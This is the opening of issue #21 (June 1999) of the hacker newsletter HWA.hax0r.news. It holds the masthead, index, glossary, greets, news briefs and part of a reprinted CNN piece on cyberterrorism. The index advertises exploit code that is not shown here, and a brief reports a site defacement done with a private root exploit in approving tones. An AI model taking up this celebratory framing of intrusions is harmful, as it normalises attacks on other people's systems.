[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                        <=-[ HWA.hax0r.news ]-=>                        =
==========================================================================
[=HWA'99=]                          Number 21 Volume 1 1999 June 5th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and airportman for the Cubesoft bandwidth. Also shouts out to all our * mirror sites! tnx guys.

    http://www.csoft.net/~hwa
    http://www.digitalgeeks.com/hwa

* Other mirror sites are listed in appendix A.1

Synopsis
---------

The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to complement such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, it's a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
                   Welcome to HWA.hax0r.news ... #21
=-----------------------------------------------------------------------=

We could use some more people joining the channel, it's usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi...

*******************************************************************
***       /join #HWA.hax0r.news on EFnet the key is `zwen'      ***
***                                                             ***
*** please join to discuss or impart news on techno/phac scene  ***
*** stuff or just to hang out ... someone is usually around 24/7***
***                                                             ***
*** Note that the channel isn't there to entertain you its for  ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack                                ***
***                                                             ***
*******************************************************************

=-------------------------------------------------------------------------=

Issue #21
In 1995, a New Jersey farmer yanked up a cable with his backhoe, knocking out 60 percent of the regional and long distance phone service in New York City and air traffic control functions in Boston, New York and Washington. In 1996, a rodent chewed through a cable in Palo Alto, California, and knocked Silicon Valley off the Internet for hours.

    - CNN

=--------------------------------------------------------------------------=
                                [ INDEX ]
=--------------------------------------------------------------------------=
  Key     Content
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Bracing for guerrilla warfare in cyberspace (CNN)................
04.0 .. The hacker from an administrator's point of view (system)........
05.0 .. Retaliation against the FBI continues............................
06.0 .. Threat to online privacy: The Search Warrant.....................
07.0 .. 2600 in Aussieland bares its teeth at the current clampdown on The Net
08.0 .. Can the CIA break into banks?....................................
09.0 .. Emmanuel Goldstein Interview ....................................
10.0 .. DOD Unplugs From Net as Another Gov Site Gets Hit ...............
11.0 .. UCITA About to be Approved ......................................
12.0 .. Japan Follows Australia in Limiting Privacy .....................
13.0 .. AGNPAC Revealed .................................................
14.0 .. Bomb Making Info Available, For Nukes! ..........................
15.0 .. Exploit code for remote ipop2d security vulnerability that gives attacker a shell as user 'nobody'
16.0 .. Netscape Communicator 4.x "view-source:" JavaScript based security vulnerability
17.0 .. Vulnerability in Broker FTP Server v. 3.0 Build 1................
18.0 .. whois_raw.cgi problem............................................
19.0 .. Linux kernel 2.2.x vulnerability/exploit.........................
20.0 .. New Allaire Security Bulletin (ASB99-09).........................
21.0 .. sdtcm_convert Overflow Exploits( for Intel Solaris 7)............
22.0 .. ActiveState Security Advisory....................................
23.0 .. Exploit in Internet Explorer 5.0.................................
24.0 .. IRIX 6.5 nsd virtual filesystem vulnerability....................
25.0 .. a practical attack against ZKS Freedom...........................
26.0 .. DoS against PC Anywhere..........................................
27.0 .. weaknesses in dns label decoding, denial of service attack (code included) (fwd)
28.0 .. Microsoft Worker Raided .........................................
29.0 .. Is the FBI Missing the Point? ...................................
30.0 .. Norwegian Newspaper Cracked .....................................
31.0 .. Student Busted for Changing Grades ..............................
32.0 .. FBI Lobbying Group Pushes for EavesDropping Capability ..........
33.0 .. Cons, Cons and more Cons ........................................
34.0 .. Friday June 4th: FREE KEVIN Demonstrations Today! ..............
35.0 .. Germany Frees Crypto ............................................
36.0 .. US Congress Demands Echelon Docs ................................
37.0 .. Windows2000 Already Available ...................................
38.0 .. NetBus Takes #1 Spot ............................................
39.0 .. [ISN] Police will have 24-hour access to secret files............
40.0 .. [ISN] Hack attack knocks out FBI site............................
41.0 .. [ISN] What's a Little Hacking Between Friends?...................
42.0 .. [ISN] New hacker attack uses screensavers........................
43.0 .. [ISN] Hackers beware: IBM to sharpen Haxor.......................
44.0 .. [ISN] Feds Fend Off HACK3RZ......................................
45.0 .. [ISN] High-tech snooping tools developed for spy agency..........
46.0 .. [ISN] Privacy issues have taken center stage.....................
47.0 .. [ISN] Whitehouse to punish Hackers...............................
48.0 .. [ISN] Federal Cybercrime unit hunts for hackers..................
49.0 .. [ISN] Hong Kong Computer Hacking Syndicate Smashed...............
50.0 .. [ISN] New Tools Prevent Network Attacks..........................
51.0 .. [ISN] U.K. Crypto Policy May Have Hidden Agenda..................
52.0 .. [ISN] Tackling E-Privacy in New York.............................
53.0 .. [ISN] Congress, NSA butt heads over Echelon......................
54.0 .. [ISN] Visa, Wells Fargo Deliver E-Payment Alternatives...........
55.0 .. [ISN] Protocols serve up VPN security............................
=--------------------------------------------------------------------------=

AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact.
        Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information.......................................
        Current dates: Aug19th-22nd Niagara Falls... .................

HA.HA .. Humour and puzzles ............................................

         Hey You!........................................................
         =------=........................................................
         Send in humour for this section! I need a laugh and its hard to find good stuff... ;)...........................................

SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=

@HWA'99

00.0  (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING.
LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD

Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1  CONTACT INFORMATION AND MAIL DROP
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks.

Send all goodies to:

    HWA NEWS
    P.O BOX 44118
    370 MAIN ST. NORTH
    BRAMPTON, ONTARIO
    CANADA
    L6V 4H5

WANTED!: POSTCARDS! YESH!
POSTCARDS, I COLLECT EM so I know a lot of you are reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof.

If you still can't think of anything you're probably not that interesting a person after all so don't worry about it

Our current email:

    Submissions/zine gossip.....: hwa@press.usmc.net
    Private email to editor.....: cruciphux@dok.org
    Distribution/Website........: sas72@usa.net

@HWA

00.2  Sources ***
      ~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed.

    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
    News site (HNN) ..................http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ ...............http://www.l0pht.com/
    NewsTrolls .......................http://www.newstrolls.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+Security................http://www.gammaforce.org/
    News site+Security................http://www.projectgamma.com/
    News site+Security................http://securityhole.8m.com/
    News site+Security related site...http://www.403-security.org/
    News/Humour site+ ................Link

    http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
    http://www.ottawacitizen.com/business/
    http://search.yahoo.com.sg/search/news_sg?p=hack
    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
    http://www.zdnet.com/zdtv/cybercrime/
    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.

    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
    http://freespeech.org/eua/ Electronic Underground Affiliation
    http://ech0.cjb.net ech0 Security
    http://axon.jccc.net/hir/ Hackers Information Report
    http://net-security.org Net Security
    http://www.403-security.org Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care whether the article/email is to be used in an issue or not and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box.

- Ed

Mailing List Subscription Info   (Far from complete)         Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin. To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

    http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks.

Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list's charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list.

Please follow the below guidelines on what kind of information should be posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.

For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin)

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html.
Back issues are available on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

    Computer underground Digest    Sun 14 Feb, 1999    Volume 11 : Issue 09

    ISSN 1004-042X

    Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
    News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
    Archivist: Brendan Kehoe
    Poof Reader: Etaion Shrdlu, Jr.
    Shadow-Archivists: Dan Carosone / Paul Southworth
                       Ralph Sims / Jyrki Kuoppala
                       Ian Dickinson
    Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed

Subscribe: mail majordomo@repsec.com with "subscribe isn".

@HWA

00.3  THIS IS WHO WE ARE
      ~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    cruciphux@dok.org.........: currently active/editorial
    darkshadez@ThePentagon.com: currently active/man in black
    fprophet@dok.org..........: currently active/IRC+ man in black
    sas72@usa.net ............. currently active/IRC+ distribution
    vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
    dicentra...(email withheld): IRC+ grrl in black

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    N0Portz ..........................: Australia
    Qubik ............................: United Kingdom
    system error .....................: Indonesia
    Wile (wile coyote) ...............: Japan/the East
    Ruffneck ........................: Netherlands/Holland

And unofficially yet contributing too much to ignore ;)

    Spikeman .........................: World media

Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed

    http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
    http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

*******************************************************************
***       /join #HWA.hax0r.news on EFnet the key is `zwen'      ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...

@HWA

00.4  Whats in a name? why HWA.hax0r.news??
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pigeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book.
It's almost like buying a clue. Anyway..on with the show .. - Editorial staff

@HWA

00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed below: Some are very useful, others attempt to deny any possible attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA - see EoA ;-)

!= - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..)

AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one??

*CC - 1 - Credit Card (as in phraud)
      2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC - Chaos Computer Club (Germany)

*CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC - End of Commentary

EoA - End of Article or more commonly @HWA

EoF - End of file

EoD - End of diatribe (AOL'ers: look it up)

FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;)

du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or 'can you hax0r some bread on the way to the table please?'
         2 - A tool for cutting sheet metal.

HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;&

HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI- Missing on/from IRC

NFC - Depends on context: No Further Comment or No Fucking Comment

NFR - Network Flight Recorder (Do a websearch) see 0wn3d

NFW - No fuckin'way

*0WN3D - You are cracked and owned by an elite entity see pheer

*OFCS - Oh for christ's sakes

PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

        Alternates: H - hacking, hacktivist
                    C - Cracking
                    C - Cracking
                    V - Virus
                    W - Warfare
                    A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                    P - Phreaking, "telephone hacking" PHone fREAKs ...
                    CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d

*RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass.

TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA - To Be Arranged/To Be Announced also 2ba

TFS - Tough fucking shit.

*w00t - 1 - Reserved for the uber ereet, no one can say this without severe repercussions from the underground masses. also "w00ten"
        2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf - what the fuck

*ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0  Greets!?!?! yeah greets! w0w huh. - Ed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway.
* all the people who sent in cool emails and support

    FProphet       Pyra                               TwstdPair
    _NeM_          D----Y                             Kevin Mitnick (watch yer back)
    Dicentra       vexxation                          sAs72
    Spikeman       Astral                             p0lix
    Vexx           g0at security

Shouts to tekz from HK for asking nicely in eye-are-see! ;-) and to t4ck for making my night albeit I couldn't stick around for the rest of the comedy routine. hacked star dot star with phf huh? .... ;-))

and the #innerpulse, crew and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, ;)

kewl sites:

+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1  Last minute stuff, rumours and newsbytes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always popular..." - FProphet '99

+++ When was the last time you backed up your important data?

++ INN Gone?

   From ProjectGamma http://www.projectgamma.com/news/34.html

   June 2, 1999, 00:09
   Author: WHiTe VaMPiRe

   Innerpulse News Network (INN) has a message on their Web site stating that it was taken down by order of the U.S. government for transmitting military secrets to the Chinese. The validity of this message is unknown. It could just be another joke perpetuated by s1ko, the Webmaster of INN. Once Project Gamma discovers the validity of the message you will be the first to know.

   Related links:
   Innerpulse News Network http://www.innerpulse.com/

++ Ultratech Hacked by Infiltrators Inc.

   From ProjectGamma, http://www.projectgamma.com/news/38.html

   June 3, 1999, 01:13
   Author: nexus

   Ultratech-is.net was recently hacked by a new group on the net named Infiltrators Inc., a new security group formed by "nexus."
Officials at Ultratech were alerted to the security breach and have secured the server with the help of Infiltrators Inc. Ultratech's site remained "altered" for approximately 5 hours, and was still undiscovered by admins. The group then removed the altered page and reposted the origional as the admins still did not notice. The site was hacked using a private exploit made by Shiva2000 of Infiltrators Inc. to gain root access. This is the first webpage altered by the group, who was founded May 24, 1999. Related Links: Ultratech website http://www.ultratech-is.net Reported by nexus ++ OpenSEC Mailing List From HNN http://www.hackernews.com/ contributed by cult_hero A new mailing list has popped up called OpenSEC (Open Security Solutions). This list is dedicated to announcing the latest versions of free and Open Source security tools. For more information, Open Security Solutions http://www.opensec.net ++ HIR #9 From HNN http://www.hackernews.com/ contributed by h_i_r HiR E-Zine Crew brings forth Hackers Information Report: Issue #9. Covered in HiR 9: An Operating system comparison (FreeBSD, RedHat 5.2, and NT4), **How to make your own Acoustic coupler**, and all sorts of other goodies and cool stuff. Check it out. HiR Distro Site http://axon.jccc.net/hir/ ++ The New Antidote is Available. From HNN http://www.hackernews.com/ contributed by Lord Oak With more info on Cold Fusion Fixes, Bomb making information on the net, and Social Engineering, Antidote has released its newest issue. Antidote Volume 2 Issue 6 http://www.thepoison.org/antidote/issues/vol2/6.txt Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NO mail this week for posting here! ================================================================ @HWA 02.0 From the editor. 
~~~~~~~~~~~~~~~~

    #include <stdio.h>

    int main(void)
    {
      printf ("Read commented source!\n\n");

      /*
       * *#21? yep, enjoy ...
       *
       *
       */
      printf ("EoF.\n");
      return 0;
    }

Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

@HWA

03.0 [CNN] Bracing for guerrilla warfare in cyberspace
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Bracing for guerrilla warfare in cyberspace

http://www.cnn.com/TECH/specials/hackers/cyberterror/

'There are lots of opportunities; that's very scary'

April 6, 1999
Web posted at: 2:29 p.m. EDT (1829 GMT)

By John Christensen
CNN Interactive

(CNN) -- It is June, the children are out of school, and as highways and airports fill with vacationers, rolling power outages hit sections of Los Angeles, Chicago, Washington and New York. An airliner is mysteriously knocked off the flight control system and crashes in Kansas.

Parts of the 911 service in Washington fail, supervisors at the Department of Defense discover that their e-mail and telephone services are disrupted and officers aboard a U.S. Navy cruiser find that their computer systems have been attacked.

As incidents mount, the stock market drops precipitously, and panic surges through the population.

Unlikely? Hardly. The "electronic Pearl Harbor" that White House terrorism czar Richard A. Clarke fears is not just a threat, it has already happened.

Much of the scenario above -- except for the plane and stock market crashes and the panic -- occurred in 1997 when 35 hackers hired by the National Security Agency launched simulated attacks on the U.S. electronic infrastructure.

"Eligible Receiver," as the exercise was called, achieved "root level" access in 36 of the Department of Defense's 40,000 networks. The simulated attack also "turned off" sections of the U.S.
power grid, "shut down" parts of the 911 network in Washington, D.C., and other cities and gained access to systems aboard a Navy cruiser at sea. At a hearing in November 1997, Sen. Jon Kyl, R-Arizona, chairman of a Senate technology subcommittee, reported that nearly two-thirds of U.S. government computers systems have security holes. "If somebody wanted to launch an attack," says Fred B. Schneider, a professor of computer science at Cornell University, "it would not be at all difficult." 'There are lots of opportunities' Although "Eligible Receiver" took place in the United States, which has about 40 percent of the world's computers, the threat of cyberterrorism is global. Consider: During the Gulf War, Dutch hackers stole information about U.S. troop movements from U.S. Defense Department computers and tried to sell it to the Iraqis, who thought it was a hoax and turned it down. In March 1997, a 15-year-old Croatian youth penetrated computers at a U.S. Air Force base in Guam. In 1997 and 1998, an Israeli youth calling himself "The Analyzer" allegedly hacked into Pentagon computers with help from California teen-agers. Ehud Tenebaum, 20, was charged in Jerusalem in February 1999 with conspiracy and harming computer systems. In February 1999, unidentified hackers seized control of a British military communication satellite and demanded money in return for control of the satellite. The report was vehemently denied by the British military, which said all satellites were "where they should be and doing what they should be doing." Other knowledgable sources, including the Hacker News Network, called the hijacking highly unlikely. "There are lots of opportunities," says Schneider. "That's very scary." 'The Holy Grail of hackers' President Clinton announced in January 1999 a $1.46 billion initiative to deal with U.S. government computer security -- a 40 percent increase over fiscal 1998 spending. 
Of particular concern is the Pentagon, the military stronghold of the world's most powerful nation. "It's the Holy Grail of hackers," says computer security expert Rob Clyde. "It's about bragging rights for individuals and people with weird agendas." Clyde is vice president and general manager of technical security for Axent Technologies, a company headquartered in Rockville, Maryland, that counts the Pentagon as one of its customers. The Defense Department acknowledges between 60 and 80 attacks a day, although there have been reports of far more than that. The government says no top secret material has ever been accessed by these intruders, and that its most important information is not online. But the frustration is evident. Michael Vatis, director of the FBI's National Infrastructure Protection Committee, told a Senate subcommittee last year that tracing cyberattacks is like "tracking vapor." 'A lot of clueless people' Schneider says the "inherently vulnerable" nature of the electronic infrastructure makes counterterrorism measures even more difficult. Schneider chaired a two-year study by the National Academy of Sciences and the National Academy of Engineering that found that the infrastructure is badly conceived and poorly secured. "There is a saying that the amount of 'clue' [knowledge] on the Internet is constant, but the size of the Internet is growing exponentially," says Schneider. "In other words, there are a lot of clueless people out there. It's basically a situation where people don't know how to lock the door before walking out, so more and more machines are vulnerable." Schneider says the telephone system is far more complicated than it used to be, with "a lot of nodes that are programmable, and databases that can be hacked." 
